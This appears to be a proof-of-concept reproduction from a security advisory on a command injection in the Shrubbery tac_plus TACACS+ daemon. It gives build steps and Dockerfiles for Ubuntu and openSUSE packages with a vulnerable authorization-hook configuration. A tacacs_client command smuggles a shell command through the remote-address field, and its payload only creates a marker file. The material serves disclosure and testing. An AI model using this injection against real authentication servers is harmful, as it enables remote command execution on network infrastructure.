# compile daemon with debug symbols
wget https://shrubbery.net/pub/tac_plus/tacacs-F4.0.4.28.tar.gz
tar xzf tacacs-F4.0.4.28.tar.gz
cd tacacs-F4.0.4.28
CFLAGS="-g3 -O0" ./configure
# run the daemon
./tac_plus \
-G \
-d 5 \
-l /dev/stdout \
-p 4949 \
-C tac_plus.cfg
This section includes examples of Linux distributions that use the Shrubbery Networks fork.
- tacacs+ package in Ubuntu Bionic
- Upstream: Shrubbery (https://www.shrubbery.net/tac_plus/)
FROM ubuntu:bionic
RUN apt update -y && apt install -y tacacs+
SHELL ["/bin/bash", "-c"]
RUN echo $'accounting file = /tmp/tac_acc.log\n \
user=DEFAULT {\n \
before authorization "/bin/false -- \'$user\' \'$name\' \'$address\'"\n \
service = exec {\n \
default attribute = permit\n \
}\n \
}' > /tmp/tac_plus.cfg
CMD ["/usr/sbin/tac_plus", "-G", "-d", "5", "-l", "/dev/stdout", "-p", "4949", "-C", "tac_plus.cfg"]
# docker build -t tac_plus_ubuntu -f Dockerfile.ubuntu .
# docker run --rm -p 4949:4949 --name tac_plus_ubuntu tac_plus_ubuntu
# tacacs_client --host --port 4949 --username DEFAULT --rem-addr "asd';touch /tmp/tacpluspoc123 #" authorize -c service=exec
# docker exec tac_plus_ubuntu ls -la /tmp
- tac_plus package in the network repository
- Upstream: Shrubbery (https://www.shrubbery.net/tac_plus/)
FROM opensuse/leap
RUN zypper ref && \
zypper ar https://download.opensuse.org/repositories/network/15.4/ network && \
zypper --gpg-auto-import-keys refresh && \
zypper --non-interactive dist-upgrade --allow-vendor-change --from network && \
zypper update -y
RUN zypper install -y tac_plus || true
SHELL ["/bin/bash", "-c"]
RUN echo $'accounting file = /tmp/tac_acc.log\n \
user=DEFAULT {\n \
before authorization "/bin/false -- \'$user\' \'$name\' \'$address\'"\n \
service = exec {\n \
default attribute = permit\n \
}\n \
}' > /tmp/tac_plus.cfg
CMD ["/usr/sbin/tac_plus", "-G", "-d", "5", "-l", "/dev/stdout", "-p", "4949", "-C", "tac_plus.cfg"]
# docker build -t tac_plus_opensuse -f Dockerfile.opensuse .
# docker run --rm -p 4949:4949 --name tac_plus_opensuse tac_plus
# tacacs_client --host --port 4949 --username DEFAULT --rem-addr "asd';touch /tmp/tacpluspoc123 #" authorize -c service=exec
# docker exec tac_plus_opensuse ls -la /tmp